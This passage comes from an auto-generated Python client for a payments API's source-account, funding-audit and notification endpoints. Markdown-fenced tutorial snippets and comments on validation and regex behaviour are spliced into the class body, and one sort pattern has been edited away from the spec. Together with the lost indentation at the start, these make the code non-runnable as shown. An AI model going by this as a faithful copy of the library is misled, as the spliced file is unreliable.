_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_source_account_v2(self, source_account_id, **kwargs): # noqa: E501
"""Get details about given source account. # noqa: E501
Get details about given source account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_source_account_v2(source_account_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str source_account_id: Source account id (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: SourceAccountResponseV2
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_source_account_v2_with_http_info(source_account_id, **kwargs) # noqa: E501
def get_source_account_v2_with_http_info(self, source_account_id, **kwargs): # noqa: E501
"""Get details about given source account. # noqa: E501
Get details about given source account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_source_account_v2_with_http_info(source_account_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str source_account_id: Source account id (required)
:param _return_http_data_only: return the response data only, without
the status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(SourceAccountResponseV2, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['source_account_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_source_account_v2" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'source_account_id' is set
if ('source_account_id' not in local_var_params or
local_var_params['source_account_id'] is None):
raise ApiValueError("Missing the required parameter `source_account_id` when calling `get_source_account_v2`") # noqa: E501
collection_formats = {}
path_params = {}
if 'source_account_id' in local_var_params:
path_params['sourceAccountId'] = local_var_params['source_account_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2'] # noqa: E501
return self.api_client.call_api(
'/v2/sourceAccounts/{sourceAccountId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SourceAccountResponseV2', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_source_account_v3(self, source_account_id, **kwargs): # noqa: E501
"""Get details about given source account. # noqa: E501
Get details about given source account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_source_account_v3(source_account_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str source_account_id: Source account id (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: SourceAccountResponseV3
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_source_account_v3_with_http_info(source_account_id, **kwargs) # noqa: E501
def get_source_account_v3_with_http_info(self, source_account_id, **kwargs): # noqa: E501
"""Get details about given source account. # noqa: E501
Get details about given source account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_source_account_v3_with_http_info(source_account_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str source_account_id: Source account id (required)
:param _return_http_data_only: return the response data only, without
the status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(SourceAccountResponseV3, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['source_account_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_source_account_v3" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'source_account_id' is set
if ('source_account_id' not in local_var_params or
local_var_params['source_account_id'] is None):
raise ApiValueError("Missing the required parameter `source_account_id` when calling `get_source_account_v3`") # noqa: E501
collection_formats = {}
path_params = {}
if 'source_account_id' in local_var_params:
path_params['sourceAccountId'] = local_var_params['source_account_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2'] # noqa: E501
return self.api_client.call_api(
'/v3/sourceAccounts/{sourceAccountId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SourceAccountResponseV3', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_source_accounts(self, **kwargs): # noqa: E501
"""Get list of source accounts # noqa: E501
List source accounts. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_source_accounts(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str physical_account_name: Physical Account Name
:param str payor_id: The account owner Payor ID
:param int page: Page number. Default is 1.
:param int page_size: The number of results to return in a page (between 1 and 100)
:param str sort: List of sort fields, e.g. ?sort=name:asc. Default is name:asc. The supported sort field is fundingRef.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: ListSourceAccountResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_source_accounts_with_http_info(**kwargs) # noqa: E501
def get_source_accounts_with_http_info(self, **kwargs): # noqa: E501
"""Get list of source accounts # noqa: E501
List source accounts. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_source_accounts_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str physical_account_name: Physical Account Name
:param str payor_id: The account owner Payor ID
:param int page: Page number. Default is 1.
:param int page_size: The number of results to return in a page (between 1 and 100)
:param str sort: List of sort fields, e.g. ?sort=name:asc. Default is name:asc. The supported sort field is fundingRef.
:param _return_http_data_only: return the response data only, without
the status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(ListSourceAccountResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['physical_account_name', 'payor_id', 'page', 'page_size', 'sort'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_source_accounts" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
if 'page_size' in local_var_params and local_var_params['page_size'] > 100: # noqa: E501
raise ApiValueError("Invalid value for parameter `page_size` when calling `get_source_accounts`, must be a value less than or equal to `100`") # noqa: E501
if 'page_size' in local_var_params and local_var_params['page_size'] < 1: # noqa: E501
raise ApiValueError("Invalid value for parameter `page_size` when calling `get_source_accounts`, must be a value greater than or equal to `1`") # noqa: E501
# note: `[fundingRef]+[:desc|:asc]` treated both halves as character classes; the
# intent is the literal field name plus a sort direction, i.e. fundingRef:asc|desc
if 'sort' in local_var_params and not re.search(r'fundingRef:(desc|asc)', local_var_params['sort']): # noqa: E501
raise ApiValueError("Invalid value for parameter `sort` when calling `get_source_accounts`, must conform to the pattern `/fundingRef:(desc|asc)/`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'physical_account_name' in local_var_params:
query_params.append(('physicalAccountName', local_var_params['physical_account_name'])) # noqa: E501
if 'payor_id' in local_var_params:
query_params.append(('payorId', local_var_params['payor_id'])) # noqa: E501
if 'page' in local_var_params:
query_params.append(('page', local_var_params['page'])) # noqa: E501
if 'page_size' in local_var_params:
query_params.append(('pageSize', local_var_params['page_size'])) # noqa: E501
if 'sort' in local_var_params:
query_params.append(('sort', local_var_params['sort'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2'] # noqa: E501
return self.api_client.call_api(
'/v1/sourceAccounts', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ListSourceAccountResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
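    # The repeated `page_size` bounds checks above follow a simple
    # validate-or-raise pattern. A minimal standalone sketch of that pattern
    # (the helper name and defaults here are illustrative, not part of the
    # generated client):

```python
def validate_page_size(page_size, min_size=1, max_size=100):
    """Return page_size unchanged, or raise ValueError if out of bounds."""
    if page_size > max_size:
        raise ValueError(
            "Invalid value for parameter `page_size`, must be a value "
            "less than or equal to `%d`" % max_size)
    if page_size < min_size:
        raise ValueError(
            "Invalid value for parameter `page_size`, must be a value "
            "greater than or equal to `%d`" % min_size)
    return page_size
```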
    def get_source_accounts_v2(self, **kwargs):  # noqa: E501
        """Get list of source accounts  # noqa: E501

        List source accounts.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_source_accounts_v2(async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str physical_account_name: Physical Account Name
        :param str physical_account_id: The physical account ID
        :param str payor_id: The account owner Payor ID
        :param str funding_account_id: The funding account ID
        :param int page: Page number. Default is 1.
        :param int page_size: The number of results to return in a page
        :param str sort: List of sort fields e.g. ?sort=name:asc Default is name:asc The supported sort fields are - fundingRef, name, balance
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: ListSourceAccountResponseV2
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        return self.get_source_accounts_v2_with_http_info(**kwargs)  # noqa: E501
    def get_source_accounts_v2_with_http_info(self, **kwargs):  # noqa: E501
        """Get list of source accounts  # noqa: E501

        List source accounts.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_source_accounts_v2_with_http_info(async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str physical_account_name: Physical Account Name
        :param str physical_account_id: The physical account ID
        :param str payor_id: The account owner Payor ID
        :param str funding_account_id: The funding account ID
        :param int page: Page number. Default is 1.
        :param int page_size: The number of results to return in a page
        :param str sort: List of sort fields e.g. ?sort=name:asc Default is name:asc The supported sort fields are - fundingRef, name, balance
        :param _return_http_data_only: return the response data only, without
                                       the status code and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: tuple(ListSourceAccountResponseV2, status_code(int), headers(HTTPHeaderDict))
                 If the method is called asynchronously,
                 returns the request thread.
        """
        local_var_params = locals()

        all_params = ['physical_account_name', 'physical_account_id', 'payor_id', 'funding_account_id', 'page', 'page_size', 'sort']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_source_accounts_v2" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']

        if 'page_size' in local_var_params and local_var_params['page_size'] > 100:  # noqa: E501
            raise ApiValueError("Invalid value for parameter `page_size` when calling `get_source_accounts_v2`, must be a value less than or equal to `100`")  # noqa: E501
        if 'page_size' in local_var_params and local_var_params['page_size'] < 1:  # noqa: E501
            raise ApiValueError("Invalid value for parameter `page_size` when calling `get_source_accounts_v2`, must be a value greater than or equal to `1`")  # noqa: E501
        if 'sort' in local_var_params and not re.search(r'[fundingRef|name|balance]+[:desc|:asc]', local_var_params['sort']):  # noqa: E501
            raise ApiValueError("Invalid value for parameter `sort` when calling `get_source_accounts_v2`, must conform to the pattern `/[fundingRef|name|balance]+[:desc|:asc]/`")  # noqa: E501

        collection_formats = {}

        path_params = {}

        query_params = []
        if 'physical_account_name' in local_var_params:
            query_params.append(('physicalAccountName', local_var_params['physical_account_name']))  # noqa: E501
        if 'physical_account_id' in local_var_params:
            query_params.append(('physicalAccountId', local_var_params['physical_account_id']))  # noqa: E501
        if 'payor_id' in local_var_params:
            query_params.append(('payorId', local_var_params['payor_id']))  # noqa: E501
        if 'funding_account_id' in local_var_params:
            query_params.append(('fundingAccountId', local_var_params['funding_account_id']))  # noqa: E501
        if 'page' in local_var_params:
            query_params.append(('page', local_var_params['page']))  # noqa: E501
        if 'page_size' in local_var_params:
            query_params.append(('pageSize', local_var_params['page_size']))  # noqa: E501
        if 'sort' in local_var_params:
            query_params.append(('sort', local_var_params['sort']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['OAuth2']  # noqa: E501

        return self.api_client.call_api(
            '/v2/sourceAccounts', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='ListSourceAccountResponseV2',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)
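    # Note on the `sort` check above: the pattern is taken verbatim from the
    # API spec, but square brackets make each part a regex *character class*,
    # so the check is more permissive than the alternation it suggests. A
    # short illustration (the stricter pattern shown is only an illustrative
    # alternative, not the documented contract):

```python
import re

spec_pattern = r'[fundingRef|name|balance]+[:desc|:asc]'        # as generated
strict_pattern = r'^(fundingRef|name|balance)(:(asc|desc))?$'   # illustrative

def spec_ok(sort):
    return re.search(spec_pattern, sort) is not None

def strict_ok(sort):
    return re.match(strict_pattern, sort) is not None
```

Both accept `name:asc`, but the character-class form also accepts strings such as `bad:` whose letters merely appear somewhere in the bracketed lists.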
    def get_source_accounts_v3(self, **kwargs):  # noqa: E501
        """Get list of source accounts  # noqa: E501

        List source accounts.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_source_accounts_v3(async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str physical_account_name: Physical Account Name
        :param str physical_account_id: The physical account ID
        :param str payor_id: The account owner Payor ID
        :param str funding_account_id: The funding account ID
        :param bool include_user_deleted: A filter for retrieving both active accounts and user deleted ones
        :param SourceAccountType type: The type of source account.
        :param int page: Page number. Default is 1.
        :param int page_size: The number of results to return in a page
        :param str sort: List of sort fields e.g. ?sort=name:asc Default is name:asc The supported sort fields are - fundingRef, name, balance
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: ListSourceAccountResponseV3
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        return self.get_source_accounts_v3_with_http_info(**kwargs)  # noqa: E501
    def get_source_accounts_v3_with_http_info(self, **kwargs):  # noqa: E501
        """Get list of source accounts  # noqa: E501

        List source accounts.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_source_accounts_v3_with_http_info(async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str physical_account_name: Physical Account Name
        :param str physical_account_id: The physical account ID
        :param str payor_id: The account owner Payor ID
        :param str funding_account_id: The funding account ID
        :param bool include_user_deleted: A filter for retrieving both active accounts and user deleted ones
        :param SourceAccountType type: The type of source account.
        :param int page: Page number. Default is 1.
        :param int page_size: The number of results to return in a page
        :param str sort: List of sort fields e.g. ?sort=name:asc Default is name:asc The supported sort fields are - fundingRef, name, balance
        :param _return_http_data_only: return the response data only, without
                                       the status code and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: tuple(ListSourceAccountResponseV3, status_code(int), headers(HTTPHeaderDict))
                 If the method is called asynchronously,
                 returns the request thread.
        """
        local_var_params = locals()

        all_params = ['physical_account_name', 'physical_account_id', 'payor_id', 'funding_account_id', 'include_user_deleted', 'type', 'page', 'page_size', 'sort']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_source_accounts_v3" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']

        if 'page_size' in local_var_params and local_var_params['page_size'] > 100:  # noqa: E501
            raise ApiValueError("Invalid value for parameter `page_size` when calling `get_source_accounts_v3`, must be a value less than or equal to `100`")  # noqa: E501
        if 'page_size' in local_var_params and local_var_params['page_size'] < 1:  # noqa: E501
            raise ApiValueError("Invalid value for parameter `page_size` when calling `get_source_accounts_v3`, must be a value greater than or equal to `1`")  # noqa: E501
        if 'sort' in local_var_params and not re.search(r'[fundingRef|name|balance]+[:desc|:asc]', local_var_params['sort']):  # noqa: E501
            raise ApiValueError("Invalid value for parameter `sort` when calling `get_source_accounts_v3`, must conform to the pattern `/[fundingRef|name|balance]+[:desc|:asc]/`")  # noqa: E501

        collection_formats = {}

        path_params = {}

        query_params = []
        if 'physical_account_name' in local_var_params:
            query_params.append(('physicalAccountName', local_var_params['physical_account_name']))  # noqa: E501
        if 'physical_account_id' in local_var_params:
            query_params.append(('physicalAccountId', local_var_params['physical_account_id']))  # noqa: E501
        if 'payor_id' in local_var_params:
            query_params.append(('payorId', local_var_params['payor_id']))  # noqa: E501
        if 'funding_account_id' in local_var_params:
            query_params.append(('fundingAccountId', local_var_params['funding_account_id']))  # noqa: E501
        if 'include_user_deleted' in local_var_params:
            query_params.append(('includeUserDeleted', local_var_params['include_user_deleted']))  # noqa: E501
        if 'type' in local_var_params:
            query_params.append(('type', local_var_params['type']))  # noqa: E501
        if 'page' in local_var_params:
            query_params.append(('page', local_var_params['page']))  # noqa: E501
        if 'page_size' in local_var_params:
            query_params.append(('pageSize', local_var_params['page_size']))  # noqa: E501
        if 'sort' in local_var_params:
            query_params.append(('sort', local_var_params['sort']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['OAuth2']  # noqa: E501

        return self.api_client.call_api(
            '/v3/sourceAccounts', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='ListSourceAccountResponseV3',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)
    def list_funding_audit_deltas(self, payor_id, updated_since, **kwargs):  # noqa: E501
        """Get Funding Audit Delta  # noqa: E501

        Get funding audit deltas for a payor  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.list_funding_audit_deltas(payor_id, updated_since, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str payor_id: (required)
        :param datetime updated_since: (required)
        :param int page: Page number. Default is 1.
        :param int page_size: The number of results to return in a page
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: PageResourceFundingPayorStatusAuditResponseFundingPayorStatusAuditResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        return self.list_funding_audit_deltas_with_http_info(payor_id, updated_since, **kwargs)  # noqa: E501
    def list_funding_audit_deltas_with_http_info(self, payor_id, updated_since, **kwargs):  # noqa: E501
        """Get Funding Audit Delta  # noqa: E501

        Get funding audit deltas for a payor  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.list_funding_audit_deltas_with_http_info(payor_id, updated_since, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str payor_id: (required)
        :param datetime updated_since: (required)
        :param int page: Page number. Default is 1.
        :param int page_size: The number of results to return in a page
        :param _return_http_data_only: return the response data only, without
                                       the status code and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: tuple(PageResourceFundingPayorStatusAuditResponseFundingPayorStatusAuditResponse, status_code(int), headers(HTTPHeaderDict))
                 If the method is called asynchronously,
                 returns the request thread.
        """
        local_var_params = locals()

        all_params = ['payor_id', 'updated_since', 'page', 'page_size']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method list_funding_audit_deltas" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']

        # verify the required parameter 'payor_id' is set
        if ('payor_id' not in local_var_params or
                local_var_params['payor_id'] is None):
            raise ApiValueError("Missing the required parameter `payor_id` when calling `list_funding_audit_deltas`")  # noqa: E501
        # verify the required parameter 'updated_since' is set
        if ('updated_since' not in local_var_params or
                local_var_params['updated_since'] is None):
            raise ApiValueError("Missing the required parameter `updated_since` when calling `list_funding_audit_deltas`")  # noqa: E501

        if 'page_size' in local_var_params and local_var_params['page_size'] > 100:  # noqa: E501
            raise ApiValueError("Invalid value for parameter `page_size` when calling `list_funding_audit_deltas`, must be a value less than or equal to `100`")  # noqa: E501
        if 'page_size' in local_var_params and local_var_params['page_size'] < 1:  # noqa: E501
            raise ApiValueError("Invalid value for parameter `page_size` when calling `list_funding_audit_deltas`, must be a value greater than or equal to `1`")  # noqa: E501

        collection_formats = {}

        path_params = {}

        query_params = []
        if 'payor_id' in local_var_params:
            query_params.append(('payorId', local_var_params['payor_id']))  # noqa: E501
        if 'updated_since' in local_var_params:
            query_params.append(('updatedSince', local_var_params['updated_since']))  # noqa: E501
        if 'page' in local_var_params:
            query_params.append(('page', local_var_params['page']))  # noqa: E501
        if 'page_size' in local_var_params:
            query_params.append(('pageSize', local_var_params['page_size']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['OAuth2']  # noqa: E501

        return self.api_client.call_api(
            '/v1/deltas/fundings', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='PageResourceFundingPayorStatusAuditResponseFundingPayorStatusAuditResponse',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)
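    # All the generated wrappers share the same calling convention:
    # synchronous by default, or `async_req=True` to get back a thread-like
    # object whose .get() yields the result. A minimal mock of that
    # convention (FakeThread and FakeApi are hypothetical stand-ins used
    # only for illustration, not part of this client):

```python
class FakeThread:
    """Stands in for the thread object returned when async_req=True."""
    def __init__(self, result):
        self._result = result

    def get(self):
        return self._result


class FakeApi:
    def list_funding_audit_deltas(self, payor_id, updated_since, async_req=False):
        result = {'payorId': payor_id, 'updatedSince': updated_since}
        if async_req:
            return FakeThread(result)  # async: caller joins via .get()
        return result                  # sync: result returned directly
```

Usage: `api.list_funding_audit_deltas('p1', '2020-01-01')` returns the result directly, while passing `async_req=True` returns an object to call `.get()` on.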
    def set_notifications_request(self, source_account_id, set_notifications_request, **kwargs):  # noqa: E501
        """Set notifications  # noqa: E501

        Set notifications for a given source account  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.set_notifications_request(source_account_id, set_notifications_request, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str source_account_id: Source account id (required)
        :param SetNotificationsRequest set_notifications_request: Body including the minimum balance to set (required)
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        return self.set_notifications_request_with_http_info(source_account_id, set_notifications_request, **kwargs)  # noqa: E501
    def set_notifications_request_with_http_info(self, source_account_id, set_notifications_request, **kwargs):  # noqa: E501
        """Set notifications  # noqa: E501

        Set notifications for a given source account  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.set_notifications_request_with_http_info(source_account_id, set_notifications_request, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str source_account_id: Source account id (required)
        :param SetNotificationsRequest set_notifications_request: Body including the minimum balance to set (required)
        :param _return_http_data_only: return the response data only, without
                                       the status code and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        local_var_params = locals()

        all_params = ['source_account_id', 'set_notifications_request']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method set_notifications_request" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']

        # verify the required parameter 'source_account_id' is set
        if ('source_account_id' not in local_var_params or
                local_var_params['source_account_id'] is None):
            raise ApiValueError("Missing the required parameter `source_account_id` when calling `set_notifications_request`")  # noqa: E501
        # verify the required parameter 'set_notifications_request' is set
        if ('set_notifications_request' not in local_var_params or
                local_var_params['set_notifications_request'] is None):
            raise ApiValueError("Missing the required parameter `set_notifications_request` when calling `set_notifications_request`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'source_account_id' in local_var_params:
            path_params['sourceAccountId'] = local_var_params['source_account_id']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'set_notifications_request' in local_var_params:
